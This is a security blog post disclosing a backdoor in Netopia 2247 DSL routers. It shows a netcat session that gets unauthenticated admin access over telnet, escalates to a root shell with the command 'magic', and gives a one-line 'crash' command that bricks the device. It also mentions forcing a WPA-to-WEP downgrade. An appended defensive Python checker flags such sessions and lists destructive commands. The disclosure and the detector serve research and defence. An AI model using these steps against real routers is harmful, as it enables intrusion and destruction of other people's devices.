Revisiting the Netopia Unauthenticated TELNET backdoor vulnerability and "stupidly easy privilege escalation".
So I used netcat to connect to port 23 on the router and was greeted with a nice telnet console, as expected.
The initial access was administrative, but the command "magic" gives a root shell, allowing you a few extra commands - notably the "crash" command. (to brick the box, "crash read 0x00" works well!)
So to recap, we have the following vulnerabilities...
> Unauthenticated TELNET login backdoor
> Unprotected administrative privileges
> Privilege escalation "admin to root"
> Denial of service vulnerability (brick it)
Now that is not all - the WEP key generation algorithm on these is notoriously bad, and is predictable based on the SSID - notably the Eircom ones. In the lab I was able to use mdk3 to force a Netopia router to "downgrade" from WPA to WEP.
So now we also have a "security fucking up" vulnerability to add to the pot...
Here is the log of the accessing and privilege escalation, I then typed "help" and quit.
root@bt:~# nc 192.168.1.254 23
Terminal shell v1.0
Copyright ©2006 Netopia, Inc. All rights reserved.
Netopia Model 2247-02 High-Power Wireless DSL Ethernet Managed Switch
Running Netopia SOC OS version 7.7.0 (build r6)
Multimode ADSL Capable
(Admin completed login: Full Read/Write access)
Netopia-2000/28176900> magic
magic
(poof!)
Netopia-2000/28176900# help
help
arp to send ARP request
atmping to send ATM OAM loopback
brcm to read/write broadcom switch
clear to erase all stored configuration information
clear_certificate to clear stored SSL certificate
clear_log to clear stored log data
configure to configure unit's options
diagnose to run self-test
download to download config file
exit to quit this shell
help to get more: "help all" or "help help"
hotspot to set or show hotspot authentication info
install to download and program an image into flash
loopback to set the interface in loopback mode
license to enter an upgrade key to add a feature
log to add a message to the diagnostic log
loglevel to report or change diagnostic log level
netstat to show IP information
nslookup to send DNS query for host
ping to send ICMP Echo request
quit to quit this shell
reset to reset subsystems
restart to restart unit
rma_count to perform RMA functions
show to show system information
sslclient to send HTTPS request to the Server. Default Port is 433
start to start subsystem
status to show basic status of unit
telnet to telnet to a remote host
traceroute to send traceroute probes
upload to upload config file
view to view configuration summary
ata to all Remote Config of ATA's related cmds
who to show who is using the shell
bootflags to show or set the bootflags
checksum to calculate and display the cksums
console to make this session the console
mem to display or edit system memory
trace to toggle routing tracing
crash to cause system death
adsldebug to debug commands
dsm to DSM commands
set_language to set web display language
peer-address to print IP address of this shell user
? to get help: "help all" or "help help"
Netopia-2000/28176900# quit
quit
Goodbye.
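For anyone reviewing captured telnet sessions (honeypot logs, packet-capture exports) for exactly this class of device, here is a small checker I am adding as an illustration; it is not part of the original post and the Netopia strings in it are only a constructed sample modelled on the transcript above. It strips the telnet option-negotiation bytes that show up as garbage before the banner, then flags three things a defender wants to know from a session: whether an administrative login was reported without any credential prompt having been shown, whether the prompt changed from the admin `>` to the root `#` and which command preceded that change, and whether any of the destructive commands listed in the help output were issued afterwards.

```python
"""Flag unauthenticated admin access and admin-to-root escalation in a captured
telnet session transcript. Added example; the device strings and negotiation
bytes below are a constructed sample, not data from a real capture."""
import re

IAC = 0xFF
NEGOTIATION = {0xFB, 0xFC, 0xFD, 0xFE}  # WILL, WONT, DO, DONT each carry one option byte


def strip_telnet_negotiation(raw: bytes) -> str:
    """Drop telnet option-negotiation sequences (the unprintable bytes that
    precede the banner) and decode the remaining text as latin-1."""
    out = bytearray()
    i = 0
    while i < len(raw):
        b = raw[i]
        if b == IAC and i + 1 < len(raw):
            cmd = raw[i + 1]
            if cmd == IAC:            # escaped 0xFF data byte
                out.append(IAC)
                i += 2
            elif cmd in NEGOTIATION:  # IAC <cmd> <option>
                i += 3
            else:                     # IAC <cmd> with no option byte
                i += 2
            continue
        out.append(b)
        i += 1
    return out.decode("latin-1")


LOGIN_RE = re.compile(r"\((\w+) completed login: ([^)]*)\)")
CRED_PROMPT_RE = re.compile(r"(?i)\b(login|username|password)\s*:")
# hostname, then '>' (admin) or '#' (root), optionally followed by the typed command
PROMPT_RE = re.compile(r"^([\w.\-/]+)([>#])(?:\s+(\S+).*)?$")
# commands from the device's own help output that alter or kill the unit
DESTRUCTIVE = {"crash", "clear", "install", "restart", "mem"}


def analyze_session(raw: bytes) -> dict:
    """Return findings about one captured session: banner, whether admin access
    was granted without a credential prompt, whether a root shell was reached,
    the command that preceded the escalation, and destructive commands issued."""
    findings = {
        "banner": None,
        "credential_prompt_seen": False,
        "unauthenticated_admin": False,
        "access_level": None,
        "escalation_command": None,
        "root_shell_reached": False,
        "destructive_commands": [],
    }
    level = None         # '>' or '#' once a prompt has been seen
    last_command = None  # most recent command typed at a prompt
    for line in strip_telnet_negotiation(raw).splitlines():
        line = line.rstrip()
        if findings["banner"] is None and "Terminal shell" in line:
            findings["banner"] = line
        m = LOGIN_RE.search(line)
        if m:  # device reports a completed login
            findings["access_level"] = m.group(2)
            if not findings["credential_prompt_seen"]:
                findings["unauthenticated_admin"] = True
            continue
        if CRED_PROMPT_RE.search(line):
            findings["credential_prompt_seen"] = True
            continue
        p = PROMPT_RE.match(line)
        if not p:
            continue
        new_level, command = p.group(2), p.group(3)
        if level == ">" and new_level == "#":
            findings["root_shell_reached"] = True
            findings["escalation_command"] = last_command
        level = new_level
        if command:
            if command in DESTRUCTIVE:
                findings["destructive_commands"].append(command)
            last_command = command
    return findings


# Constructed sample: a transcript modelled on the session shown in this post,
# prefixed with three telnet negotiation sequences (WILL ECHO, WILL SGA, DO TTYPE).
SAMPLE_SESSION = b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18" + "\r\n".join([
    "Terminal shell v1.0",
    "Copyright 2006 Netopia, Inc. All rights reserved.",
    "Netopia Model 2247-02 High-Power Wireless DSL Ethernet Managed Switch",
    "Running Netopia SOC OS version 7.7.0 (build r6)",
    "(Admin completed login: Full Read/Write access)",
    "Netopia-2000/28176900> magic",
    "magic",
    "(poof!)",
    "Netopia-2000/28176900# help",
    "help",
    "crash to cause system death",
    "Netopia-2000/28176900# quit",
    "quit",
    "Goodbye.",
]).encode("latin-1")

if __name__ == "__main__":
    for key, value in analyze_session(SAMPLE_SESSION).items():
        print(f"{key}: {value}")
```

The useful signal is the combination: a "completed login" line with no preceding credential prompt identifies a device handing out admin access to anyone who connects, and a `>` to `#` prompt change tells you the session went on to root. Run over a directory of exported sessions, the `destructive_commands` list is what you would page on.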
~ This info is for educational and academic and such non-evil uses only.
I ain't responsible for your misdeeds.